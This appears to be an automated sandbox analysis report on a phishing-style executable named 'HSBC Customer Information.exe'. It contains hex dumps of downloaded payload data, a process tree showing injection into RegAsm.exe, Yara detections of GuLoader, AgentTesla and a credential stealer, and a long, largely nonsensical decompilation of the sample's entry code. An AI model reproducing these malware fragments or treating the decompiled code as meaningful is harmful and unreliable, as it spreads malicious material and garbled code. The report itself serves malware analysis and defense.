              2021-09-15 05:14:39 UTC180INData Raw: 4c 8a ce 64 58 fc 61 02 d8 46 68 a2 70 3e b2 28 b7 b5 21 20 48 e2 64 e1 e0 42 7c d5 57 d7 6c ae 60 89 af 09 72 a4 65 23 e8 97 98 22 71 4b 69 69 d9 6c 49 53 36 1d 9d bc 6c 36 49 32 aa 81 8e c6 fe ea b5 2c 42 e3 3f 25 56 34 de 1e c0 75 6e 5d e9 cc 06 6c 5d 4b 6d d1 00 28 2e bc 44 ba 93 89 47 32 0a f6 b9 c9 30 dc 58 f7 e9 17 00 d8 6c 1e 8c eb 57 b3 a0 40 32 49 a1 cf 08 44 26 65 cc c3 be 74 39 63 a0 05 aa ef 20 ad 5e 33 b5 f8 d2 5f 86 fd 13 35 48 fd d4 f2 f6 17 6a 6a a3 cd 32 d2 15 16 fe c6 0a 35 72 43 0d d8 f4 98 52 21 18 89 bd da 05 86 01 85 37 0b 0b ea 18 13 9a a7 74 32 40 2b 96 70 cc c3 e9 54 47 c2 21 cf 68 1d fd 98 55 a8 1c e1 ae 4f 1d ae 21 62 a6 3f 04 68 06 6c 64 8f 21 bf ca c4 4f 45 d7 53 8f 64 e2 db c0 96 5c 52 84 cc 1e e2 98 19 67 b2 30 de 42 b4 0b
              Data Ascii: LdXaFhp>(! HdB|Wl`re#"qKiilIS6l6I2,B?%V4un]l]Km(.DG20XlW@2ID&et9c ^3_5Hjj25rCR!7t2@+pTG!hUO!b?hld!OESd\Rg0B
              2021-09-15 05:14:39 UTC187INData Raw: ed 97 97 49 3f 35 9f c3 14 c7 f7 1d f0 c2 6d e5 81 b9 d6 d9 7c ee 32 aa ad 18 6b 0a 81 50 7b 84 81 6b 98 42 b2 e6 c4 ca 31 17 a6 ed e4 bd c2 f8 23 c4 7a 59 af e4 2b d5 45 b4 d4 b3 ad 1d 3b 45 b9 a4 92 d1 2b 9d 0d f0 77 f0 eb fa 1b 98 8c 1c 09 f3 94 53 05 88 56 2c e9 3b 39 88 85 a9 19 1f c9 7f 7f 79 ef 40 bb 87 3f a9 55 7a b5 a2 13 23 8d a7 fe 51 6f 4f 4d 69 de 96 95 1a 5f 83 6c 24 51 a7 04 de a2 f8 df 48 bb a0 87 40 64 e8 f3 7d 5d ab 06 c0 d6 43 27 4d d7 8d 32 41 9e 7f b0 00 2f 87 5b d6 0f 80 1b 6f 6d 96 0b e4 ee b3 a3 6c 65 1d 28 35 ac 6a c2 4e b7 d6 f7 91 eb c9 e9 45 c1 b2 7d e4 e3 24 64 61 f6 15 94 c4 57 d6 ab df 6e 35 67 6c cc db 57 49 13 00 d8 e9 45 e7 6d 21 a5 26 9f 72 08 03 13 e6 63 dd fe d4 7c 1d 59 f8 60 d3 60 01 fd c2 7c a4 65 7d eb 17 81 c4 73
              Data Ascii: I?5m|2kP{kB1#zY+E;E+wSV,;9y@?Uz#QoOMi_l$QH@d}]C'M2A/[omle(5jNE}$daWn5glWIEm!&rc|Y``|e}s
              2021-09-15 05:14:39 UTC195INData Raw: 0f 13 7f 9d f1 6e 40 34 67 36 2c 72 cf d3 4c 35 a2 4b a9 c7 f2 ba 05 9b 58 f5 55 f3 b6 45 30 88 c7 f4 46 ee b3 ea 8c 56 5a 61 a4 be 2a bf 26 e3 74 28 d8 1d 7f b2 29 d8 de bd 72 eb f4 41 b2 8a e9 8c b1 24 7e b9 9d 42 a2 37 30 03 2e 1b b2 fa 1a df 8e b2 8d 41 9b 94 09 53 0c 2b d8 73 8d 4b 06 d4 14 60 71 e7 6d f4 87 29 59 fa 33 64 3d 96 64 6c b6 61 50 9f 1d eb 89 3b 7c 65 09 b5 da c7 b6 12 0c e2 c4 98 44 2e 54 56 35 1f ad f5 b3 ad 0f a4 1a af f0 a8 b6 ca d3 5c ce 98 48 3d 45 71 8f 65 0a 97 82 a0 43 3e 9a d3 89 6f 83 ee 9b 5d 91 b2 ea c0 1a 9f 95 28 0e 92 31 75 d6 13 56 61 b3 3a cd a5 15 79 01 92 7b 83 cd 46 7d b9 db 04 d3 7a 9f f8 f5 7c 5f e2 cf a2 66 9d 92 b5 92 c2 23 83 fa 1d a4 ab 17 aa 6a 06 c7 7d 05 f1 ee ec 0a 84 c5 09 e6 ca c2 87 a8 04 7e b3 c8 99 81
              Data Ascii: n@4g6,rL5KXUE0FVZa*&t()rA$~B70.AS+sK`qm)Y3d=dlaP;|eD.TV5\H=EqeC>o](1uVa:y{F}z|_f#j}~
              2021-09-15 05:14:39 UTC203INData Raw: 57 32 cb ff a6 ad 56 eb 29 43 11 7f cf 60 19 fd 0f 49 8d 39 27 ad 30 01 5f 7a 62 ae 37 07 de 06 bb 65 6e 21 d0 ff db 14 47 d6 41 ba e3 db bc c1 70 4c 1a 80 f3 41 ee 90 1a 47 24 3e cb 40 50 17 d2 b8 a9 56 95 fc 54 80 f9 95 02 0b d0 50 ed 40 ed f3 ed d4 87 4f 31 d5 07 5b f7 60 d5 85 0f a3 11 cd 2b f7 cc cb d2 87 14 73 04 6b b3 25 c4 b9 e8 50 f3 fb 43 7a 93 87 77 44 3a 2b 8a e6 8d 76 ab 0b 83 a5 fb e5 32 38 2b 03 6c fa cc 3b 0c 7b 51 a1 05 6b 02 7a 3d 97 6a 94 d1 ff 4c 0a 9b a0 b3 78 3a 53 6f af af 86 90 ea 72 b9 d2 ad 6b 4e 88 4d 73 b4 2b f4 12 a1 28 6b 1e 90 cc f5 8a 30 f7 38 35 f4 06 56 5b 45 de 99 a0 1e 7b f8 6a 95 b2 8c 65 16 3c f5 e2 2b 22 32 34 4e 34 34 b6 d3 06 4c a2 2e c9 c6 83 d0 01 d0 32 e6 31 9d 96 21 5b 8a a4 9f 46 89 d9 ea cd 3b 4b 02 cd b8 6c
              Data Ascii: W2V)C`I9'0_zb7en!GApLAG$>@PVTP@O1[`+sk%PCzwD:+v28+l;{Qkz=jLx:SorkNMs+(k085V[E{je<+"24N44L.21![F;Kl
              2021-09-15 05:14:39 UTC211INData Raw: 92 fc b3 7f ae d3 07 4a 7c ea e1 8d 05 51 ca a3 65 46 d3 52 70 d1 05 45 ff 32 07 df 43 60 3a 78 29 ad cb 95 ca 2f 0b 1d ea 63 e7 fc c9 72 47 5a 39 66 db 69 cb f7 16 77 b9 60 a7 68 2f a5 c3 64 23 7b 8e 1b 6f 5b d2 76 93 93 19 7d bd 43 41 b7 03 c7 45 be e2 a7 d7 50 aa 9c cd 49 4c d6 be 89 1e 66 40 e7 52 0e 67 51 a8 4f ae 01 f9 77 b5 44 bf 9b 07 49 f0 1b 00 a9 34 84 3f 23 f7 e8 06 83 db 7d b0 11 01 54 ce a3 4b 6e 4b a0 cf 08 d2 26 60 db 24 bc 0a 39 4f fc 05 aa ef 20 3b 5e 6a b1 18 d8 30 06 07 41 3f 58 f5 c9 61 e6 c7 63 8b ac a1 b3 89 54 11 e6 de 12 be 77 ca 0b 3c eb e0 5a b8 55 0a 89 de 05 11 00 9f 18 cd 0c 8a 1d bc c3 b8 71 2f 45 a0 93 d8 cd 21 cb 28 4f 0e 74 ca 6e 00 f8 0c 57 89 25 0e aa 12 1e 43 73 6e a8 31 03 f6 04 ab 7d 6c 3b ca d7 d6 1b 5a ca 56 87 d2
              Data Ascii: J|QeFRpE2C`:x)/crGZ9fiw`h/d#{o[v}CAEPILf@RgQOwDI4?#}TKnK&`$9O ;^j0A?XacTw<ZUq/E!(OtnW%Csn1}l;ZV


              Code Manipulations


              System Behavior

              General

              Start time: 07:11:04
              Start date: 15/09/2021
              Path: C:\Users\user\Desktop\HSBC Customer Information.exe
              Wow64 process (32bit): true
              Commandline: 'C:\Users\user\Desktop\HSBC Customer Information.exe'
              Imagebase: 0x400000
              File size: 122880 bytes
              MD5 hash: 448F83467C61E465162DAF7CF8D9E88F
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: Visual Basic
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Author: Joe Security
              Reputation: low

              General

              Start time: 07:12:57
              Start date: 15/09/2021
              Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Wow64 process (32bit): true
              Commandline: 'C:\Users\user\Desktop\HSBC Customer Information.exe'
              Imagebase: 0xbf0000
              File size: 64616 bytes
              MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: .Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, Author: Joe Security
              Reputation: high

              General

              Start time: 07:12:58
              Start date: 15/09/2021
              Path: C:\Windows\System32\conhost.exe
              Wow64 process (32bit): false
              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase: 0x7ff6b2800000
              File size: 625664 bytes
              MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Reputation: high

              Disassembly

              Code Analysis


                Executed Functions

                C-Code - Quality: 69%
                			_entry_(signed int __eax, signed char __ebx, signed int __ecx, signed char __edx, signed int* __edi, void* __fp0) {
                				intOrPtr* _t141;
                				void* _t142;
                				signed int _t144;
                				signed char _t145;
                				signed char _t148;
                				signed int _t149;
                				signed char _t150;
                				void* _t151;
                				signed int _t153;
                				signed int _t156;
                				signed int _t159;
                				signed int _t161;
                				signed char _t162;
                				signed char _t165;
                				signed int _t197;
                				void* _t212;
                				signed int _t213;
                				signed int _t216;
                				signed int _t217;
                				signed char _t246;
                				void* _t248;
                				signed char _t254;
                				void* _t255;
                				signed int* _t258;
                				signed int _t260;
                				intOrPtr* _t262;
                				signed int _t266;
                				signed int _t267;
                				intOrPtr* _t271;
                				signed int* _t272;
                				signed short _t290;
                				void* _t294;
                				signed int _t295;
                				signed int _t296;
                				signed int _t301;
                				signed int _t303;
                				signed int _t305;
                				intOrPtr _t316;
                				intOrPtr _t317;
                				signed int _t320;
                				intOrPtr _t326;
                				signed int _t329;
                				intOrPtr _t337;
                				void* _t341;
                				intOrPtr _t346;
                				intOrPtr _t347;
                				signed int _t369;
                
                				_t257 = __edi;
                				_t254 = __edx;
                				_t215 = __ecx;
                				_t166 = __ebx;
                				_push("VB5!6&*"); // executed
                				L004017A6(); // executed
                				 *__eax =  *__eax + __eax;
                				 *__eax =  *__eax + __eax;
                				 *__eax =  *__eax + __eax;
                				 *__eax =  *__eax ^ __eax;
                				 *__eax =  *__eax + __eax;
                				_t141 = __eax + 1;
                				 *_t141 =  *_t141 + _t141;
                				 *_t141 =  *_t141 + _t141;
                				 *_t141 =  *_t141 + _t141;
                				 *_t141 =  *_t141 + __ecx;
                				_pop(_t142);
                				asm("stc");
                				asm("out dx, al");
                				asm("adc edx, [ebx-0x56]");
                				asm("cdq");
                				_t144 = _t142 - 0x00000001 ^  *__edi;
                				if(_t144 < 0) {
                					L5:
                					 *_t144 =  *_t144 + _t144;
                					 *_t144 =  *_t144 + _t144;
                					_t266 = _t266 - 1;
                					 *_t144 =  *_t144 + _t144;
                					 *_t144 =  *_t144 + _t144;
                					_t145 = _t144 |  *_t144;
                				} else {
                					_push(ds);
                					_t215 = 0;
                					 *_t144 =  *_t144 + _t144;
                					 *_t144 =  *_t144 + _t144;
                					 *0 =  *0 + _t144;
                					 *_t144 =  *_t144 + _t144;
                					 *__ebx =  *__ebx + _t144;
                					_t145 = _t144 +  *0;
                					 *_t145 =  *_t145 + _t145;
                					_t1 = _t145 + 0x6c;
                					 *_t1 =  *((intOrPtr*)(_t145 + 0x6c)) + __edx;
                					if( *_t1 == 0) {
                						_t266 =  *0xFFFFFFFF0BAF3331 * 0x736e6f63;
                						if (_t266 != 0) goto L3;
                						 *_t145 =  *_t145 + _t145;
                						 *_t145 =  *_t145 + _t145;
                						_t213 = __ebx + __ebx;
                						 *_t145 =  *_t145 ^ _t145;
                						_t301 = _t301;
                						_t257 = __edi -  *0xFFFFFFFF1A219945;
                						asm("sbb al, 0x69");
                						es = es;
                						asm("cmpsb");
                						asm("bound esp, [edi+0x4f3a8358]");
                						asm("lodsd");
                						_t165 = (_t145 | 0x00000032) ^  *(__edx - 0x74cf43bc);
                						asm("stosb");
                						 *((intOrPtr*)(_t165 - 0x2d)) =  *((intOrPtr*)(_t165 - 0x2d)) + _t165;
                						_t144 = _t213 ^  *0xFFFFFFFFB711CF66;
                						_t166 = _t165;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						 *_t144 =  *_t144 + _t144;
                						goto L5;
                					}
                				}
                				 *((intOrPtr*)(_t215 + 0x56 + _t215 * 2)) =  *((intOrPtr*)(_t215 + 0x56 + _t215 * 2)) + _t215;
                				_push(_t166);
                				_push(_t301);
                				_t258 =  &(_t257[0]);
                				_t267 = _t266 - 1;
                				_t294 = 0xffffffff85d79969;
                				_push(_t301);
                				 *0x53000b01 =  *0x53000b01 + _t215;
                				_t316 =  *0x53000b01;
                				asm("outsd");
                				asm("insd");
                				asm("insd");
                				asm("popad");
                				if(_t316 <= 0) {
                					L13:
                					asm("arpl [ebp+0x70], sp");
                					if(_t320 == 0) {
                						goto L18;
                					} else {
                						asm("outsd");
                						 *0x1040759 =  *0x1040759 + _t145;
                						_t149 = _t145 | 0x00000008;
                						asm("out dx, eax");
                						 *_t254 =  *_t254 + _t254;
                						 *_t149 =  *_t149 + _t149;
                						 *_t166 =  *_t166 + 1;
                						goto L15;
                					}
                				} else {
                					asm("insb");
                					asm("insd");
                					if(_t316 != 0) {
                						L11:
                						_t267 =  *(_t254 + 0x31) * 0x7f041100;
                						 *(_t215 + _t145) =  *(_t215 + _t145) | _t166;
                						_t258 = 0xb013b04;
                						 *_t145 =  *_t145 + _t145;
                						 *_t166 =  *_t166 + 1;
                						 *_t145 =  *_t145 - _t145;
                						 *_t145 =  *_t145 + _t145;
                						goto L12;
                					} else {
                						 *_t215 =  *_t215 + _t166;
                						 *_t145 =  *_t145 + _t145;
                						_t254 = _t254 + 1;
                						 *_t254 =  *_t254 + _t145;
                						 *((intOrPtr*)(_t166 + _t215)) =  *((intOrPtr*)(_t166 + _t215)) + _t301;
                						_t21 = _t166 + 0x6f;
                						 *_t21 =  *((intOrPtr*)(_t166 + 0x6f)) + _t254;
                						_t317 =  *_t21;
                						asm("insd");
                						asm("insd");
                						asm("popad");
                						if(_t317 <= 0) {
                							L15:
                							 *_t149 =  *_t149 + _t149;
                							 *_t166 =  *_t166 + _t149;
                							asm("lldt word [ebx+0x75]");
                							asm("bound esi, [ebx+0x74]");
                							asm("popad");
                							asm("a16 jae 0x78");
                							if( *_t166 >= 0) {
                								_t290 =  *_t258 * 0x100;
                								 *_t258 =  *_t258 + _t215;
                								 *((intOrPtr*)(_t290 + 0x4f)) =  *((intOrPtr*)(_t290 + 0x4f)) + _t149;
                								_push(_t254);
                								_t215 = _t149;
                								_push(_t301);
                								_t166 = _t166 - 1;
                								_t258 = _t258 - 1;
                								_t294 = _t294 + 1 - 1 + 1 - 1;
                								_push(_t149);
                								 *0xda06b6 =  *0xda06b6 + _t149;
                								 *_t149 = cs;
                								asm("out dx, eax");
                								 *_t254 =  *_t254 + _t254;
                								_t162 = _t149 +  *_t149;
                								 *_t166 =  *_t166 + 1;
                								 *_t162 =  *_t162 ^ _t162;
                								 *_t162 =  *_t162 + _t162;
                								_t145 = _t162 + 0xa;
                								_t258[0x1b] = _t258[0x1b] + _t215;
                								_t301 =  *[fs:edi+0x74] * 0x676e696e;
                								 *_t215 =  *_t215 + _t145;
                								 *((intOrPtr*)(_t145 + _t145)) =  *((intOrPtr*)(_t145 + _t145)) + _t215;
                								_push(_t290 - 1);
                								goto L17;
                							}
                						} else {
                							asm("insb");
                							asm("insd");
                							if(_t317 == 0) {
                								 *0x1981 =  *0x1981 + _t254;
                								asm("sbb [fs:eax], eax");
                								 *_t166 =  *_t166 + _t215;
                								asm("adc eax, 0x1f320000");
                								 *_t145 =  *_t145 + _t145;
                								 *((intOrPtr*)(_t267 + 3)) =  *((intOrPtr*)(_t267 + 3)) + _t145;
                								 *_t215 =  *_t215 + 1;
                								asm("sbb al, [eax]");
                								 *_t145 =  *_t145 + _t145;
                								 *((intOrPtr*)(_t145 + _t145)) =  *((intOrPtr*)(_t145 + _t145)) + _t145;
                								_t301 = _t301 + 2;
                								goto L11;
                							}
                							L12:
                							 *_t254 =  *_t254 + _t145;
                							_push(es);
                							 *((intOrPtr*)(_t215 + 0x62)) =  *((intOrPtr*)(_t215 + 0x62)) + _t215;
                							asm("gs insb");
                							_t145 = _t145 ^  *_t145;
                							 *_t215 =  *_t215 + _t145;
                							 *_t145 =  *_t145 | _t145;
                							_t320 =  *_t145;
                							if(_t320 < 0) {
                								L17:
                								_t267 =  *(_t215 + 0x6d) * 0x616d6e69;
                								asm("outsb");
                								L18:
                								asm("a16 xor eax, 0x6d90500");
                								asm("out dx, eax");
                								 *_t254 =  *_t254 + _t254;
                								 *_t166 =  *_t166 + 1;
                								_t148 =  *_t166 +  *( *_t166) ^ 0x00000000;
                								 *_t148 =  *_t148 + _t148;
                								_t149 = _t148 + 0x4146000d;
                								_t258 =  &(_t258[0]);
                							} else {
                								goto L13;
                							}
                						}
                					}
                				}
                				_push(_t254);
                				_t295 = _t294 + 1;
                				_t216 = _t215 - 1;
                				_t260 =  &((_t258 - 1)[0]);
                				_push(_t166);
                				_t271 = _t267 + 1 + 1;
                				 *_t216 =  *_t216 + _t149;
                				 *0x6b616400 =  *0x6b616400 + _t216;
                				_t326 =  *0x6b616400;
                				asm("gs outsb");
                				if(_t326 == 0) {
                					L30:
                					 *0x20006dc =  *0x20006dc + _t149;
                					_t216 = 6;
                					asm("out dx, eax");
                					 *_t254 =  *_t254 + _t254;
                					_push(es);
                					_t166 = _t166 + _t166;
                					goto L31;
                				} else {
                					if(_t326 >= 0) {
                						L31:
                						 *_t166 =  *_t166 + 1;
                						goto L32;
                					} else {
                						if(_t326 < 0) {
                							L32:
                							_t271 = _t271 +  *_t271;
                							 *_t149 =  *_t149 + _t149;
                							 *_t149 =  *_t149 + _t216;
                							_push(cs);
                							_t48 = _t260 + 0x6c + _t295 * 2;
                							 *_t48 =  *((intOrPtr*)(_t260 + 0x6c + _t295 * 2)) + _t149;
                							asm("insd");
                							asm("popad");
                							asm("outsb");
                							asm("gs outsb");
                							if( *_t48 >= 0) {
                								goto L49;
                							} else {
                								asm("outsb");
                								asm("insb");
                								_t260 =  *_t216 * 0xe010100;
                								goto L34;
                							}
                						} else {
                							if (_t326 == 0) goto L23;
                							_t149 = _t149 + 0x23d0829;
                							if(_t149 > 0) {
                								asm("out dx, eax");
                								 *_t254 =  *_t254 + _t254;
                								_t149 = _t149;
                								 *_t166 =  *_t166 + 1;
                							}
                							_t295 = _t295 +  *((intOrPtr*)(_t149 + _t149));
                							 *_t149 =  *_t149 + _t149;
                							_push(es);
                							 *_t149 =  *_t149 | _t149;
                							_t329 =  *_t149;
                							_push(_t301);
                							asm("popad");
                							asm("a16 popad");
                							if(_t329 >= 0) {
                								L36:
                								_push(0x6169626f);
                							} else {
                								if(_t329 != 0) {
                									L34:
                									_push(cs);
                									_t54 = _t295 + 0x6d;
                									 *_t54 =  *((intOrPtr*)(_t295 + 0x6d)) + _t149;
                									_t337 =  *_t54;
                									if(_t337 == 0) {
                										goto L51;
                									} else {
                										if (_t337 < 0) goto L50;
                										goto L36;
                									}
                								} else {
                									 *[fs:ecx] =  *[fs:ecx] + _t149;
                									 *_t216 =  *_t216 + _t216;
                									 *((intOrPtr*)(_t260 + 0x61)) =  *((intOrPtr*)(_t260 + 0x61)) + _t254;
                									_pop(_t212);
                									_t161 = _t149 + 0x8340a53;
                									_t166 = _t212 + _t212;
                									_t272 =  *(_t295 + 0x72) * 0x6d6f64 +  *_t254;
                									 *_t161 =  *_t161 + _t161;
                									 *_t260 =  *_t260 + _t161;
                									_t159 = _t161 | 0x49524400;
                									_t254 = _t254 + 1;
                									_push(_t254);
                									_push(_t254);
                									_t260 = _t260 + 1;
                									_push(_t295);
                									_t296 = _t295 + 1;
                									_push(_t166);
                									 *_t216 =  *_t216 + _t159;
                									 *_t166 =  *_t166 + _t216;
                									_t45 =  &(_t272[0x1b]);
                									 *_t45 = _t272[0x1b] + _t159;
                									if( *_t45 < 0) {
                										_pop(_t305);
                										_pop(es);
                										asm("out dx, eax");
                										 *_t254 =  *_t254 + _t254;
                										 *_t159 =  *_t159 | _t159;
                										 *_t166 =  *_t166 + 1;
                										goto L43;
                									} else {
                										_t305 =  *(_t296 + 0x72) * 0x67;
                										if(_t305 < 0) {
                											L43:
                											_t272 = _t272 +  *_t260;
                											 *_t159 =  *_t159 + _t159;
                											 *_t254 =  *_t254 + _t217;
                											_t341 =  *_t254;
                											asm("sldt word [ecx+0x64]");
                											if(_t341 <= 0) {
                												 *((intOrPtr*)(_t217 + 0x6d)) =  *((intOrPtr*)(_t217 + 0x6d)) + _t217;
                												asm("popad");
                												 *[gs:bx+si] =  *[gs:bx+si] ^ _t159;
                												asm("sbb [edx], al");
                												goto L62;
                											} else {
                												asm("outsb");
                												if(_t341 == 0) {
                													L64:
                													 *((intOrPtr*)(_t254 + 0x4d)) =  *((intOrPtr*)(_t254 + 0x4d)) + _t159;
                													goto L65;
                												} else {
                													if(_t341 < 0) {
                														L62:
                														_t254 = _t254 + _t272[0x1b00002a];
                														if (_t254 == 0) goto L63;
                														_t272[0x1080002a] = _t272[0x1080002a] + _t217;
                														goto L64;
                													} else {
                														if(_t341 >= 0) {
                															L65:
                															_t254 = _t254 + 1;
                															_t295 = _t296 - 1;
                															asm("scasb");
                															 *_t159 =  *_t159 + _t159;
                															 *_t159 =  *_t159 + _t159;
                															 *_t272 =  *_t272 + _t166;
                															 *_t159 =  *_t159 + _t159;
                															 *_t159 =  *_t159 + _t217;
                															 *_t159 =  *_t159 + _t159;
                															 *((intOrPtr*)(_t159 + 0x2000001)) =  *((intOrPtr*)(_t159 + 0x2000001)) + _t166;
                															_t150 = _t159 +  *_t159;
                															 *_t217 =  *_t217 + _t150;
                															 *_t217 =  *_t217 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															 *((intOrPtr*)(_t150 - 0x58)) =  *((intOrPtr*)(_t150 - 0x58)) + _t254;
                															 *_t150 =  *_t150 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															 *_t150 =  *_t150 + _t150;
                															goto L66;
                														} else {
                															asm("insb");
                															asm("popad");
                															if(_t341 < 0) {
                																L55:
                																_t272 = _t271 - 1;
                																asm("outsd");
                																asm("outsb");
                																asm("o16 gs outsb");
                																asm("gs outsb");
                																if(_t347 >= 0) {
                																	goto L67;
                																} else {
                																	if (_t347 >= 0) goto L68;
                																	_t296 =  *(_t260 + 0x38) * 0;
                																}
                															} else {
                																 *_t217 =  *_t217 + _t159;
                																 *_t272 =  *_t272 + _t217;
                																 *((intOrPtr*)(_t217 + 0x42)) =  *((intOrPtr*)(_t217 + 0x42)) + _t159;
                																_t260 = _t260 - 1;
                																_push(_t295);
                																_t301 = _t305 - 1;
                																L49:
                																_t216 = _t216 - 1;
                																_t166 = _t166 + 1;
                																_t301 = _t301 + 1;
                																_t166 = _t166 + 1;
                																_push(_t301);
                																_t260 = _t260;
                																_push(_t254);
                																L51:
                																_t216 = _t216 - 1;
                																 *0x363084f =  *0x363084f + _t149;
                																asm("wait");
                																_t150 = _t149 + 0xef;
                																 *_t254 =  *_t254 + _t254;
                																 *_t150 =  *_t150 | _t150;
                																 *_t166 =  *_t166 + 1;
                																 *_t150 =  *_t150 ^ _t150;
                																 *_t150 =  *_t150 + _t150;
                																_t217 = _t216 |  *_t216;
                																_t60 = _t271 + 0x69;
                																 *_t60 =  *((intOrPtr*)(_t271 + 0x69)) + _t150;
                																_t346 =  *_t60;
                																asm("bound esp, [ebp+0x72]");
                																if(_t346 >= 0 || _t346 < 0) {
                																	L66:
                																	 *_t150 =  *_t150 + _t150;
                																	 *_t150 =  *_t150 + _t150;
                																	 *_t150 =  *_t150 + _t150;
                																	L67:
                																	_pop(_t272);
                																	_t150 = _t150 & 0x8db7005e;
                																	asm("pushfd");
                																	 *_t166 =  *_t166 + _t217;
                																} else {
                																	 *_t217 =  *_t217 + _t150;
                																	 *_t271 =  *_t271 + _t217;
                																	_t62 = _t271 + 0x6f;
                																	 *_t62 =  *((intOrPtr*)(_t271 + 0x6f)) + _t217;
                																	_t347 =  *_t62;
                																	goto L55;
                																}
                															}
                														}
                													}
                												}
                											}
                										} else {
                											_t149 = _t159 ^ 0x06dc0500;
                											goto L30;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				 *_t166 =  *_t166 | _t150;
                				_pop(_t151);
                				asm("adc [esi+0x1], bl");
                				_t197 = 0x000000d3 | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0xf];
                				gs = _t151;
                				_t153 =  *((intOrPtr*)(_t151 - 1 + 0x3abbd72));
                				_t246 = (((((((((((((_t217 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150;
                				_t262 = 0xc6d1143d;
                				while(1) {
                					L69:
                					asm("adc al, 0xd1");
                					asm("invalid");
                					 *((intOrPtr*)(_t197 - 0xaa35f86)) =  *((intOrPtr*)(_t197 - 0xaa35f86)) - _t246;
                					asm("outsd");
                					asm("aas");
                					asm("int3");
                					_t155 = _t153 + 0x00000001 & 0x8888c0d2;
                					_push(_t246);
                					asm("les eax, [edx-0x20]");
                					 *_t155 =  *_t155 | 0xeaa2d568;
                					while(1) {
                						_t113 = _t155 - 0x2b;
                						 *_t113 =  *(_t155 - 0x2b) | _t246;
                						 *0x33d783ea = _t155;
                						_t155 = 0xc;
                						if( *_t113 <= 0) {
                							goto L80;
                						}
                						L71:
                						asm("lock lds edx, [ebx-0x6714db5a]");
                						_t262 = _t262 + 1;
                						_t155 =  *_t262;
                						 *_t262 = 0xc;
                						_pop(_t272);
                						L72:
                						_pop(_t295);
                						_t246 =  *(_t262 - 0x4753b7df) * 0x45;
                						if(_t246 != 0) {
                							_t113 = _t155 - 0x2b;
                							 *_t113 =  *(_t155 - 0x2b) | _t246;
                							 *0x33d783ea = _t155;
                							_t155 = 0xc;
                							if( *_t113 <= 0) {
                								goto L80;
                							}
                						} else {
                							 *0xfab21c4a = _t155;
                							_t255 = _t254 + _t246;
                							do {
                								_pop(es);
                								_t254 = _t255 +  *((intOrPtr*)(_t262 - 0x34c3a793));
                								do {
                									_pop(_t295);
                									_t303 =  *_t272;
                									 *_t246 =  *_t246 ^ _t254;
                									asm("outsb");
                								} while ( *_t246 >= 0);
                								asm("iretd");
                								_t153 = _t155 ^  *(_t295 - 0x408cfda7);
                								asm("std");
                								if(_t153 < 0) {
                									goto L69;
                								} else {
                									asm("cdq");
                									asm("loop 0x5a");
                									asm("das");
                									_t246 = _t246 +  *((intOrPtr*)(_t295 - 0x50c673bc));
                									asm("rcr byte [ebx-0x59ac295f], cl");
                									asm("sti");
                									_push(0x4f);
                									asm("rol dword [ebp-0x434f5081], cl");
                									_t155 = _t153 ^ 0x98f84f3d;
                									_t369 = _t155;
                									_t272 = 0x6ef0324b;
                									_t120 = _t197;
                									_t197 =  *_t155;
                									 *_t155 = _t120;
                									asm("lds ecx, [ebp+0x65]");
                									asm("repe invalid");
                									asm("aas");
                									if(_t369 >= 0) {
                										goto L78;
                									}
                								}
                								goto L83;
                								L78:
                								asm("cdq");
                							} while (_t369 > 0);
                							 *(_t246 - 0x55) =  *(_t246 - 0x55) | 0xffffff9b;
                							 *(_t155 + 0x264e7709) = _t246;
                							asm("in al, 0xff");
